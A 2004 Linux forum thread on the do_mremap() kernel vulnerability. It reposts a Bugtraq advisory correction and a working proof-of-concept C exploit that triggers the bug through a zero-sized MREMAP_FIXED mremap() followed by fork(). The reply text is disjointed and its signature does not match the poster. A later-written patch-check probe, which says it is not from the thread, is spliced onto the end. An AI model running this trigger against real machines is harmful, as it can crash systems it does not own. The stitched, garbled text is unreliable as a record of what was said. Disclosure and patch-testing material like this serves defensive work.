Critical Kernel vulnerability

Protecting your Linux box
zaeemarshad
Lieutenant Colonel
Posts: 660
Joined: Sat Jul 06, 2002 12:35 pm
Location: Islamabad

Critical Kernel vulnerability

Post by zaeemarshad »

take a look at this

http://www.infoworld.com/article/04/01/ ... ole_1.html

That's strange. Two flaws in the kernel!!! I thought they changed the VM in the 2.6 series???

Regards
Zaeem
LinuxFreaK
Site Admin
Posts: 5132
Joined: Fri May 02, 2003 10:24 am
Location: Karachi

Re: Critical Kernel vulnerability

Post by LinuxFreaK »

Dear Zaeemarshad,
Salam,
zaeemarshad wrote:
    take a look at this
    http://www.infoworld.com/article/04/01/ ... ole_1.html
    That's strange. Two flaws in the kernel!!! I thought they changed the VM in the 2.6 series???

Date: Tue, 6 Jan 2004 17:30:35 +0100 (CET)
From: "Paul Starzetz" <ihaquer@isec.pl>
To: vulnwatch@vulnwatch.org, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux mremap bug correction

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

our initial posting contains a mistake about the vulnerability of the 2.2
kernel series. Since the 2.2 kernel series doesn't support the
MREMAP_FIXED flag it is NOT vulnerable. The source states
"MREMAP_FIXED option added 5-Dec-1999" but it didn't make it into recent
2.2.x. We apologize for the inconvenience.

- --
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE/+uKwC+8U3Z5wpu4RAqd0AJ4m0jn+BBYuxgZC3ZDRgwl4u7MsNACeNzGB
4DstLw+HNr703e19zrA3cjg=
=5S9B
-----END PGP SIGNATURE-----

Date: Mon, 5 Jan 2004 22:22:39 +0100
From: "Christophe Devine" <devine@iie.cnam.fr>
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Subject: Linux kernel do_mremap() proof-of-concept exploit code

The following program can be used to test if a x86 Linux system
is vulnerable to the do_mremap() exploit; use at your own risk.


$ cat mremap_poc.c

/*
 *  Proof-of-concept exploit code for do_mremap()
 *
 *  Copyright (C) 2004  Christophe Devine and Julien Tinnes
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

/* Build a raw mremap() syscall stub with the old _syscall5 macro from
 * <asm/unistd.h>, bypassing the libc wrapper so the arguments reach
 * the kernel exactly as written. */
#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
    void *base;

    base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

    /* The trigger: a zero-sized old and new area, relocated with
     * MREMAP_FIXED. A fixed kernel rejects this with EINVAL. */
    real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                 (void *) 0xC0000000 );

    /* fork() makes the kernel copy the process's memory map; on a
     * vulnerable kernel this is where the zero-sized mapping does
     * its damage. */
    fork();

    return( 0 );
}
It is, but not in 2.6.1-rc1. From http://isec.pl/vulnerabilities/isec-0013-mremap.txt:

And from http://kernel.org/pub/linux/kernel/v2.6 ... -2.6.1-rc2:

    Don't allow mremap of zero-sized areas.

The do_mremap() vulnerability is fixed in the 2.6 kernel only in 2.6.1-rc2, whereas you tested on 2.6.1-rc1. The latest version of the 2.2 kernel is 2.2.25, but there was no immediate changelog available. However, it was created on January 3, so I suspect it would have the patch?

Best Regards.
Farrukh Ahmed
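The check a practitioner wants is the proof of concept's exact mremap() request without the fork() that follows it. The program below is an added example, not code from this thread or from Devine and Tinnes: it issues the same zero-sized MREMAP_FIXED request through glibc's mremap() wrapper (the _syscall5 macro used above is gone from current headers) and reports whether the kernel refused it with EINVAL, which is what a kernel carrying the 2.6.1-rc2 "don't allow mremap of zero-sized areas" check does. The target address 0xC0000000 is kept from the original; the function name probe_zero_size_mremap is this example's own. An unpatched kernel accepts the call and the probe says so; because it never forks, it avoids the step that made the original PoC crash a vulnerable box, but run it on a test machine all the same.

```c
#define _GNU_SOURCE          /* MREMAP_MAYMOVE / MREMAP_FIXED and mremap() */
#include <errno.h>
#include <stdio.h>
#include <sys/mman.h>

/* Same fixed destination the original proof of concept used. A patched
 * kernel never looks at it: the zero new_size is rejected first. */
#define PROBE_TARGET ((void *)0xC0000000UL)

/* Make the proof of concept's mremap() call (old_size 0, new_size 0,
 * MREMAP_MAYMOVE | MREMAP_FIXED) and classify the kernel's answer.
 * Returns 1 if the kernel rejected it with EINVAL (the fixed behaviour),
 * 0 if the request was accepted (fix missing), -1 if the probe could not
 * even set up its scratch mapping. Deliberately no fork(). */
int probe_zero_size_mremap(void)
{
    void *base = mmap(NULL, 8192, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;

    errno = 0;
    void *res = mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                       PROBE_TARGET);
    int saved_errno = errno;   /* munmap() below may clobber errno */

    int rejected = (res == MAP_FAILED && saved_errno == EINVAL);
    munmap(base, 8192);
    return rejected;
}

int main(void)
{
    int r = probe_zero_size_mremap();
    if (r < 0) {
        perror("mmap");
        return 2;
    }
    if (r)
        printf("zero-sized mremap rejected with EINVAL: kernel has the fix\n");
    else
        printf("zero-sized mremap accepted: kernel is missing the fix\n");
    return r ? 0 : 1;
}
```

Exit status 0 means the kernel enforces the new_size != 0 check; 1 means it accepted the request, the same condition the original PoC relies on before its fork().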